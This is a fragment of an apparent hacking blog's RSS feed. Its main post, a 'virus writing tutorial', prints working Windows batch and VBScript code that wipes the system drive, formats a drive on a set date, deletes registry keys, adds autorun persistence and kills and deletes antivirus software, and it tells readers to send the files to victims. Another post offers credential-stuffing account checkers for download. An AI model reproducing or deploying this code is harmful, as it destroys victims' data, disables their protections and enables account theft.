&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQl8opDb-O1ntHBiH23fA1fQf7hgBT1cYzBKUb8vp4CK4bqFkV5rvyuAxuHHhGyxG_p1A0-5-dXcWm_Y4mKi9Wg6zs_hHY8P4GbysATCHfURvM9vSaNmqdSY_mL6ET-uOZBq9hv6ceU0aA/s1600/download+%25283%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;162&quot; data-original-width=&quot;310&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQl8opDb-O1ntHBiH23fA1fQf7hgBT1cYzBKUb8vp4CK4bqFkV5rvyuAxuHHhGyxG_p1A0-5-dXcWm_Y4mKi9Wg6zs_hHY8P4GbysATCHfURvM9vSaNmqdSY_mL6ET-uOZBq9hv6ceU0aA/s1600/download+%25283%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
The Complete Deep Web Course 2018: Become An Expert!&lt;br /&gt;
&lt;br /&gt;
#Requested&lt;br /&gt;
&lt;br /&gt;
The Complete Guide On How To Safely And Securely Access The Deep Web!&lt;br /&gt;
&lt;br /&gt;
Udemy Link&lt;br /&gt;
https://www.udemy.com/t&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;he-complete-deep-web-course-2017/&lt;br /&gt;
&lt;br /&gt;
Download Link&lt;br /&gt;
http://bit.ly/2IDEeBh&lt;br /&gt;
&lt;br /&gt;
Share To Help Us</description><link>https://kryptonhackingworld.blogspot.com/2018/05/complete-deep-web-course-2018.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQl8opDb-O1ntHBiH23fA1fQf7hgBT1cYzBKUb8vp4CK4bqFkV5rvyuAxuHHhGyxG_p1A0-5-dXcWm_Y4mKi9Wg6zs_hHY8P4GbysATCHfURvM9vSaNmqdSY_mL6ET-uOZBq9hv6ceU0aA/s72-c/download+%25283%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-9106540048596387115</guid><pubDate>Mon, 28 May 2018 14:17:00 +0000</pubDate><atom:updated>2018-05-28T07:17:29.051-07:00</atom:updated><title>VIRUS WRITING TUTORIAL</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvdsV9mfFAk_uiZa_oJwvDwdkZAoYHkMzlJqbTI_WUZh0rJDA8PYBD9-2PNG9oA3o7HyQU60eAzmYlEUHADWZhFIiHCU52X3YsizU9Rmk2TczQ5jauRVvgJ8paxI619P6-9unSYdw_ylPl/s1600/download+%25282%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;159&quot; data-original-width=&quot;318&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvdsV9mfFAk_uiZa_oJwvDwdkZAoYHkMzlJqbTI_WUZh0rJDA8PYBD9-2PNG9oA3o7HyQU60eAzmYlEUHADWZhFIiHCU52X3YsizU9Rmk2TczQ5jauRVvgJ8paxI619P6-9unSYdw_ylPl/s1600/download+%25282%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
⚠️VIRUS WRITING TUTORIAL&lt;br /&gt;
&lt;br /&gt;
Just Prank Your Fucking Friends😆&lt;br /&gt;
&lt;br /&gt;
IMP. Note&amp;gt;&amp;gt; I am not responsible for any damage or error reporting in Your pc do it on your own risk. This coding is only for knowledge purpose.&lt;br /&gt;
&lt;br /&gt;
All Scripts Here Are To Be &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Copied In Note Pad&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;This Virus Deletes All The Content Of A Drive…&lt;br /&gt;
&lt;br /&gt;
@echo off&lt;br /&gt;
del %systemdrive%\*.* /f /s /q&lt;br /&gt;
shutdown -r -f -t 00&lt;br /&gt;
&lt;br /&gt;
Save The Above Code in a .bat file&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Disable Internet Permanently&lt;br /&gt;
&lt;br /&gt;
Save As A bat File&lt;br /&gt;
&lt;br /&gt;
echo @echo off&amp;gt;c:windowswimn32.bat&lt;br /&gt;
echo break off&amp;gt;&amp;gt;c:windowswimn32.bat&lt;br /&gt;
echo ipconfig/release_all&amp;gt;&amp;gt;c:windowswimn32.bat&lt;br /&gt;
echo end&amp;gt;&amp;gt;c:windowswimn32.bat&lt;br /&gt;
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f&lt;br /&gt;
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f&lt;br /&gt;
echo You Have Been HACKED!&lt;br /&gt;
PAUSE&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;The Most Simple Virus To Crush The Window&lt;br /&gt;
&lt;br /&gt;
@Echo off&lt;br /&gt;
Del C:\ *.* |y&lt;br /&gt;
&lt;br /&gt;
Save It As Anything.bat&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt; This Will Crash Ur Computer&lt;br /&gt;
&lt;br /&gt;
Option Explicit&lt;br /&gt;
&lt;br /&gt;
Dim WSHShell&lt;br /&gt;
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)&lt;br /&gt;
&lt;br /&gt;
Dim x&lt;br /&gt;
For x = 1 to 100000000&lt;br /&gt;
WSHShell.Run “Tourstart.exe”&lt;br /&gt;
Next&lt;br /&gt;
&lt;br /&gt;
Save It As Anything.vbs&lt;br /&gt;
&lt;br /&gt;
It Only Works With Windows XP&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]&lt;br /&gt;
&lt;br /&gt;
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*&lt;br /&gt;
&lt;br /&gt;
Code:-&lt;br /&gt;
&lt;br /&gt;
@ECHO OFF&lt;br /&gt;
START reg delete HKCR/.exe&lt;br /&gt;
START reg delete HKCR/.dll&lt;br /&gt;
START reg delete HKCR/*&lt;br /&gt;
:MESSAGE&lt;br /&gt;
ECHO Your computer has been fcked. Have a nice day.&lt;br /&gt;
GOTO MESSAGE&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Endless Notepads&lt;br /&gt;
&lt;br /&gt;
*This will pop up endless notepads until the computer freezes and crashes*&lt;br /&gt;
&lt;br /&gt;
Code:-&lt;br /&gt;
&lt;br /&gt;
@ECHO off&lt;br /&gt;
:top&lt;br /&gt;
START %SystemRoot%\system32\notepad.exe&lt;br /&gt;
GOTO top&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt; Bomb Virus&lt;br /&gt;
&lt;br /&gt;
Copy Paste The Following&lt;br /&gt;
&lt;br /&gt;
If %date% NEQ 2009/11/25 goto exit&lt;br /&gt;
format E: /y &amp;gt;nul&lt;br /&gt;
:exit&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
And Save It As Anything.bat&lt;br /&gt;
&lt;br /&gt;
Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action&lt;br /&gt;
The Virus Will Take Effect On That Day&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Crazy caps lock&lt;br /&gt;
&lt;br /&gt;
*This constantly turns caps lock on and off really fast continuously*&lt;br /&gt;
&lt;br /&gt;
Code:-&lt;br /&gt;
&lt;br /&gt;
Set wshShell =wscript.CreateObject(”WScript.Shell”)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys “{CAPSLOCK}”&lt;br /&gt;
loop&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Endless Enter&lt;br /&gt;
&lt;br /&gt;
*This constantly makes it so the enter button is being pressed continuesly*&lt;br /&gt;
&lt;br /&gt;
Code:-&lt;br /&gt;
&lt;br /&gt;
Set wshShell = wscript.CreateObject(”WScript.Shell”)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys “~(enter)”&lt;br /&gt;
loop&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Endless Backspace&lt;br /&gt;
&lt;br /&gt;
*This makes it so the backspace key is constantly being pressed*&lt;br /&gt;
&lt;br /&gt;
Code:-&lt;br /&gt;
&lt;br /&gt;
MsgBox “Let’s go back a few steps”&lt;br /&gt;
Set wshShell =wscript.CreateObject(”WScript.Shell”)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys “{bs}”&lt;br /&gt;
loop&lt;br /&gt;
&lt;br /&gt;
What sex is your computer ?&lt;br /&gt;
&lt;br /&gt;
-&amp;gt; open notepad&lt;br /&gt;
-&amp;gt; copy code&lt;br /&gt;
&lt;br /&gt;
CreateObject(“SAPI.SpVoice”).Speak”I love YOU”&lt;br /&gt;
&lt;br /&gt;
-&amp;gt; n paste on the Notepad&lt;br /&gt;
-&amp;gt; save as &amp;gt; love.vbs&lt;br /&gt;
-&amp;gt; double-click on it&lt;br /&gt;
&lt;br /&gt;
Make Your Keyboard Disco Light&lt;br /&gt;
&lt;br /&gt;
This trick just makes your keyboard lights do disco.&lt;br /&gt;
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!&lt;br /&gt;
&lt;br /&gt;
1. This piece of code makes ur keyboard a live disco..&lt;br /&gt;
&lt;br /&gt;
Set wshShell =wscript.CreateObject(“WScript.Shell”)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys “{CAPSLOCK}”&lt;br /&gt;
wshshell.sendkeys “{NUMLOCK}”&lt;br /&gt;
wshshell.sendkeys “{SCROLLLOCK}”&lt;br /&gt;
loop&lt;br /&gt;
&lt;br /&gt;
2. This one makes it looks like a chain of light….&lt;br /&gt;
&lt;br /&gt;
Set wshShell =wscript.CreateObject(“WScript.Shell”)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 200&lt;br /&gt;
wshshell.sendkeys “{CAPSLOCK}”&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys “{NUMLOCK}”&lt;br /&gt;
wscript.sleep 50&lt;br /&gt;
wshshell.sendkeys “{SCROLLLOCK}”&lt;br /&gt;
loop&lt;br /&gt;
&lt;br /&gt;
Instructions:&lt;br /&gt;
*paste any of the two above codes in notepad&lt;br /&gt;
*Save as “AnyFileName”.vbs&lt;br /&gt;
*Run the file&lt;br /&gt;
*To stop, launch task manager and then under “Processes” end “wscript.exe”&lt;br /&gt;
&lt;br /&gt;
I hope u would like it.. 😉&lt;br /&gt;
&lt;br /&gt;
How To Disable Victim Antivirus&lt;br /&gt;
&lt;br /&gt;
Open Notepad Copy it and Paste To Notepad&lt;br /&gt;
&lt;br /&gt;
@ echo off&lt;br /&gt;
rem —&lt;br /&gt;
rem Permanently Kill Anti-Virus&lt;br /&gt;
net stop “Security Center”&lt;br /&gt;
netsh firewall set opmode mode=disable&lt;br /&gt;
tskill /A av*&lt;br /&gt;
tskill /A fire*&lt;br /&gt;
tskill /A anti*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A spy*&lt;br /&gt;
tskill /A bullguard&lt;br /&gt;
tskill /A PersFw&lt;br /&gt;
tskill /A KAV*&lt;br /&gt;
tskill /A ZONEALARM&lt;br /&gt;
tskill /A SAFEWEB&lt;br /&gt;
cls&lt;br /&gt;
tski&lt;br /&gt;
ll /A OUTPOST&lt;br /&gt;
tskill /A nv*&lt;br /&gt;
tskill /A nav*&lt;br /&gt;
tskill /A F-*&lt;br /&gt;
tskill /A ESAFE&lt;br /&gt;
tskill /A cle&lt;br /&gt;
cls&lt;br /&gt;
tskill /A BLACKICE&lt;br /&gt;
tskill /A def*&lt;br /&gt;
tskill /A kav&lt;br /&gt;
tskill /A kav*&lt;br /&gt;
tskill /A avg*&lt;br /&gt;
tskill /A ash*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A aswupdsv&lt;br /&gt;
tskill /A ewid*&lt;br /&gt;
tskill /A guard*&lt;br /&gt;
tskill /A guar*&lt;br /&gt;
tskill /A gcasDt*&lt;br /&gt;
tskill /A msmp*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A mcafe*&lt;br /&gt;
tskill /A mghtml&lt;br /&gt;
tskill /A msiexec&lt;br /&gt;
tskill /A outpost&lt;br /&gt;
tskill /A isafe&lt;br /&gt;
tskill /A zap*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A zauinst&lt;br /&gt;
tskill /A upd*&lt;br /&gt;
tskill /A zlclien*&lt;br /&gt;
tskill /A minilog&lt;br /&gt;
tskill /A cc*&lt;br /&gt;
tskill /A norton*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A norton au*&lt;br /&gt;
tskill /A ccc*&lt;br /&gt;
tskill /A npfmn*&lt;br /&gt;
tskill /A loge*&lt;br /&gt;
tskill /A nisum*&lt;br /&gt;
tskill /A issvc&lt;br /&gt;
tskill /A tmp*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A tmn*&lt;br /&gt;
tskill /A pcc*&lt;br /&gt;
tskill /A cpd*&lt;br /&gt;
tskill /A pop*&lt;br /&gt;
tskill /A pav*&lt;br /&gt;
tskill /A padmin&lt;br /&gt;
cls&lt;br /&gt;
tskill /A panda*&lt;br /&gt;
tskill /A avsch*&lt;br /&gt;
tskill /A sche*&lt;br /&gt;
tskill /A syman*&lt;br /&gt;
tskill /A virus*&lt;br /&gt;
tskill /A realm*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A sweep*&lt;br /&gt;
tskill /A scan*&lt;br /&gt;
tskill /A ad-*&lt;br /&gt;
tskill /A safe*&lt;br /&gt;
tskill /A avas*&lt;br /&gt;
tskill /A norm*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A offg*&lt;br /&gt;
del /Q /F C:\Program Files\alwils~1\avast4\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\kasper~1\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\trojan~1\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\f-prot95\*.dll&lt;br /&gt;
del /Q /F C:\Program Files\tbav\*.dat&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\avpersonal\*.vdf&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\*.cnt&lt;br /&gt;
del /Q /F C:\Program Files\Mcafee\*.*&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\*.*&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\avgamsr\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avgamsvr\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avgemc\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\avgcc\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avgupsvc\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\grisoft&lt;br /&gt;
del /Q /F C:\Program Files\nood32krn\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\nood32\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\nod32&lt;br /&gt;
del /Q /F C:\Program Files\nood32&lt;br /&gt;
del /Q /F C:\Program Files\kav\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\kavmm\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\kaspersky\*.*&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\ewidoctrl\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\guard\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\ewido\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\pavprsrv\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\pavprot\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avengine\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\apvxdwin\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\webproxy\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\panda software\*.*&lt;br /&gt;
rem —&lt;br /&gt;
&lt;br /&gt;
Now Save this code as .bat and send to victim 😀&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Tasks Kill&lt;br /&gt;
&lt;br /&gt;
@echo off&lt;br /&gt;
&lt;br /&gt;
start calc&lt;br /&gt;
&lt;br /&gt;
tskill msnmsgr&lt;br /&gt;
&lt;br /&gt;
tskill firefox&lt;br /&gt;
&lt;br /&gt;
tskill iexplore&lt;br /&gt;
&lt;br /&gt;
tskill LimreWire&lt;br /&gt;
&lt;br /&gt;
tskill explorer&lt;br /&gt;
&lt;br /&gt;
tskill explorer&lt;br /&gt;
&lt;br /&gt;
tskill explorer&lt;br /&gt;
&lt;br /&gt;
tskill explorer&lt;br /&gt;
&lt;br /&gt;
tskill explorer&lt;br /&gt;
&lt;br /&gt;
pause&lt;br /&gt;
&lt;br /&gt;
save this as .bat file and send and destroy the victim &amp;amp; k!ll Operat!ng systeM!&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Code type in notepad&lt;br /&gt;
&lt;br /&gt;
@echo off&lt;br /&gt;
shutdown -r -f -t 00&lt;br /&gt;
&lt;br /&gt;
Form Of Switches&lt;br /&gt;
&lt;br /&gt;
-s&lt;br /&gt;
Shuts down the PC.&lt;br /&gt;
&lt;br /&gt;
-l&lt;br /&gt;
Logs off the current user.&lt;br /&gt;
&lt;br /&gt;
-t nn&lt;br /&gt;
Indicates the duration of delay, in seconds, before performing the action.&lt;br /&gt;
&lt;br /&gt;
-c “messagetext”&lt;br /&gt;
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.&lt;br /&gt;
&lt;br /&gt;
-f&lt;br /&gt;
Forces any running applications to shut down.&lt;br /&gt;
&lt;br /&gt;
-r&lt;br /&gt;
Reboots the PC. ..!!..!&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt;Popping CD Drives&lt;br /&gt;
&lt;br /&gt;
*This will make the CD drives constantly pop out*&lt;br /&gt;
&lt;br /&gt;
Code:-&lt;br /&gt;
&lt;br /&gt;
Set oWMP = CreateObject(”WMPlayer.OCX.7?)&lt;br /&gt;
Set colCDROMs = oWMP.cdromCollection&lt;br /&gt;
do&lt;br /&gt;
if colCDROMs.Count &amp;gt;= 1 then&lt;br /&gt;
For i = 0 to colCDROMs.Count – 1&lt;br /&gt;
colCDROMs.Item(i).Eject&lt;br /&gt;
Next&lt;br /&gt;
For i = 0 to colCDROMs.Count – 1&lt;br /&gt;
colCDROMs.Item(i).Eject&lt;br /&gt;
Next&lt;br /&gt;
End If&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
loop&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&amp;gt; To make your pc talk&lt;br /&gt;
&lt;br /&gt;
Open a text file in notepad and write:&lt;br /&gt;
&lt;br /&gt;
Dim msg, sapi&lt;br /&gt;
msg=InputBox(“Enter your text”,”Talk it”)&lt;br /&gt;
Set sapi=CreateObject(“sapi.spvoice”)&lt;br /&gt;
sapi.Speak msg&lt;br /&gt;
&lt;br /&gt;
Save the file with a (*.vbs) extension, it will create a VBScript File.&lt;br /&gt;
It will prompt you for a text when u open the file, input the text and press ok.”&lt;br /&gt;
&lt;br /&gt;
u will hear now what u typed..&lt;br /&gt;
&lt;br /&gt;
this works in xp, vista, win7 , Win 10 , Win8 also.&lt;br /&gt;
&lt;br /&gt;
Enjoy❤️!!!</description><link>https://kryptonhackingworld.blogspot.com/2018/05/virus-writing-tutorial.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvdsV9mfFAk_uiZa_oJwvDwdkZAoYHkMzlJqbTI_WUZh0rJDA8PYBD9-2PNG9oA3o7HyQU60eAzmYlEUHADWZhFIiHCU52X3YsizU9Rmk2TczQ5jauRVvgJ8paxI619P6-9unSYdw_ylPl/s72-c/download+%25282%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-2539805721543383577</guid><pubDate>Mon, 28 May 2018 14:06:00 +0000</pubDate><atom:updated>2018-05-28T07:06:55.035-07:00</atom:updated><title>GIVE AWAY</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfoY29nrqyYEIyruxURncOLq7c_Z_a1tcY91zS-bFy4F_ruEcp4CzYTRuCShukjMmifLH4Gk7A8ZbUca2MCcTAKhacvazymlNu8LVFCXpHRiSqh_7McygtKocLCekLCTctK9QZsq7GtMk/s1600/download+%25281%2529.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;181&quot; data-original-width=&quot;278&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfoY29nrqyYEIyruxURncOLq7c_Z_a1tcY91zS-bFy4F_ruEcp4CzYTRuCShukjMmifLH4Gk7A8ZbUca2MCcTAKhacvazymlNu8LVFCXpHRiSqh_7McygtKocLCekLCTctK9QZsq7GtMk/s1600/download+%25281%2529.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
🔥 Give away 🔥&lt;br /&gt;
&lt;br /&gt;
Like we have said lets start our first giveaways please use it on your own risk we do not responsible for what u do with this tools&lt;br /&gt;
&lt;br /&gt;
🌟 Aio Checker&lt;br /&gt;
🌟 Account reaper (with Hits)&lt;br /&gt;
🌟 Amazon&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt; Checker&lt;br /&gt;
🌟 Amazon Configs&lt;br /&gt;
🌟 Apple&lt;br /&gt;
🌟 Bitcoinpenguin&lt;br /&gt;
🌟 Bongacams&lt;br /&gt;
🌟 BtcClicks&lt;br /&gt;
🌟 Captcha24.com&lt;br /&gt;
🌟 Coinbase&lt;br /&gt;
🌟 Freebitco.in&lt;br /&gt;
🌟 Gearbest&lt;br /&gt;
🌟 Minecraft&lt;br /&gt;
🌟 Netfilx&lt;br /&gt;
🌟 Origin&lt;br /&gt;
🌟 PayPal&lt;br /&gt;
🌟 Pornhub&lt;br /&gt;
🌟 PSN&lt;br /&gt;
🌟 Sentry MBA&lt;br /&gt;
🌟 Spotify&lt;br /&gt;
🌟 Uplay&lt;br /&gt;
&lt;br /&gt;
And Many more 👇&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://mega.nz/#F!PJoR0LjD!SiNo4g78sKAIhoTWO-7xgQ&quot;&gt;https://mega.nz/#F!PJoR0LjD!SiNo4g78sKAIhoTWO-7xgQ&lt;/a&gt;&lt;br /&gt;
=========================</description><link>https://kryptonhackingworld.blogspot.com/2018/05/give-away.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfoY29nrqyYEIyruxURncOLq7c_Z_a1tcY91zS-bFy4F_ruEcp4CzYTRuCShukjMmifLH4Gk7A8ZbUca2MCcTAKhacvazymlNu8LVFCXpHRiSqh_7McygtKocLCekLCTctK9QZsq7GtMk/s72-c/download+%25281%2529.png" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-5860366474246245206</guid><pubDate>Mon, 28 May 2018 11:49:00 +0000</pubDate><atom:updated>2018-05-28T04:49:14.108-07:00</atom:updated><title>SELF LEARNING TOPICS</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyyX8c76RtFiE4e-vaOiIR82f3jALS9CrsQ2hv1mmyIVok0wszLDtfLZaqHzeHJrab4uS5uT6SY6ST0h4QYi_tVzuVFaTFgoHYir9eiirrQU65OfR4L1CsHJmoHvfmyJ12eg8__XjQvkaT/s1600/download.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;164&quot; data-original-width=&quot;307&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyyX8c76RtFiE4e-vaOiIR82f3jALS9CrsQ2hv1mmyIVok0wszLDtfLZaqHzeHJrab4uS5uT6SY6ST0h4QYi_tVzuVFaTFgoHYir9eiirrQU65OfR4L1CsHJmoHvfmyJ12eg8__XjQvkaT/s1600/download.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
😍 Some topic for self Learning😍&lt;br /&gt;
&lt;br /&gt;
[+] Sql Injection Attack&lt;br /&gt;
[+] Hibernate Query Language Injection&lt;br /&gt;
[+] Direct OS Code Injection&lt;br /&gt;
[+] XML Entity Injection&lt;br /&gt;
[+] Broken Authen&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;tication and Session&lt;br /&gt;
Management&lt;br /&gt;
[+] Cross-Site Scripting (XSS)&lt;br /&gt;
[+] Insecure Direct Object References&lt;br /&gt;
[+] Security Misconfiguration&lt;br /&gt;
[+] Sensitive Data Exposure&lt;br /&gt;
[+] Missing Function Level Access Control&lt;br /&gt;
[+] Cross-Site Request Forgery (CSRF)&lt;br /&gt;
[+] Using Components with Known Vulnerabilities&lt;br /&gt;
[+] Unvalidated Redirects and Forwards&lt;br /&gt;
[+] Cross Site Scripting Attacks&lt;br /&gt;
[+] Click Jacking Attacks&lt;br /&gt;
[+] DNS Cache Poisoning&lt;br /&gt;
[+] Symlinking – An Insider Attack&lt;br /&gt;
[+] Cross Site Request Forgery Attacks&lt;br /&gt;
[+] Remote Code Execution Attacks&lt;br /&gt;
[+] Remote File inclusion&lt;br /&gt;
[+] Local file inclusion&lt;br /&gt;
[+] EverCookie&lt;br /&gt;
[+] Denial oF Service Attack&lt;br /&gt;
[+] Cookie Eviction&lt;br /&gt;
[+] PHPwn&lt;br /&gt;
[+] NAT Pinning&lt;br /&gt;
[+] XSHM&lt;br /&gt;
[+] MitM DNS Rebinding SSL/TLS Wildcards and&lt;br /&gt;
XSS&lt;br /&gt;
[+] Quick Proxy Detection&lt;br /&gt;
[+] Improving HTTPS Side Channel Attacks&lt;br /&gt;
[+] Side Channel Attacks in SSL&lt;br /&gt;
[+] Turning XSS into Clickjacking&lt;br /&gt;
[+] Bypassing CSRF protections with Click&lt;br /&gt;
Jacking and&lt;br /&gt;
[+] HTTP Parameter Pollution&lt;br /&gt;
[+] URL Hijacking&lt;br /&gt;
[+] Stroke Jacking&lt;br /&gt;
[+] Fooling B64_Encode(Payload) on WAFs And&lt;br /&gt;
Filters&lt;br /&gt;
[+] MySQL Stacked Queries with SQL Injection.&lt;br /&gt;
[+] Posting Raw XML cross-domain&lt;br /&gt;
[+] Generic Cross-Browser Cross-Domain theft&lt;br /&gt;
[+] Attacking HTTPS with Cache Injection&lt;br /&gt;
[+] Tap Jacking&lt;br /&gt;
[+] XSS - Track&lt;br /&gt;
[+] Next Generation Click Jacking&lt;br /&gt;
[+] XSSing Client-Side Dynamic HTML.&lt;br /&gt;
[+] Stroke triggered XSS and Stroke Jacking&lt;br /&gt;
[+] Lost iN Translation&lt;br /&gt;
[+] Persistent Cross Interface Attacks&lt;br /&gt;
[+] Chronofeit Phishing&lt;br /&gt;
[+] SQLi Filter Evasion Cheat Sheet (MySQL)&lt;br /&gt;
[+] Tabnabbing&lt;br /&gt;
[+] UI Redressing&lt;br /&gt;
[+] Cookie Poisoning&lt;br /&gt;
[+] SSRF&lt;br /&gt;
[+] Bruteforce of PHPSESSID&lt;br /&gt;
[+] Blended Threats and JavaScript&lt;br /&gt;
[+] Cross-Site Port Attacks&lt;br /&gt;
[+] CAPTCHA Re-Riding Attack&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
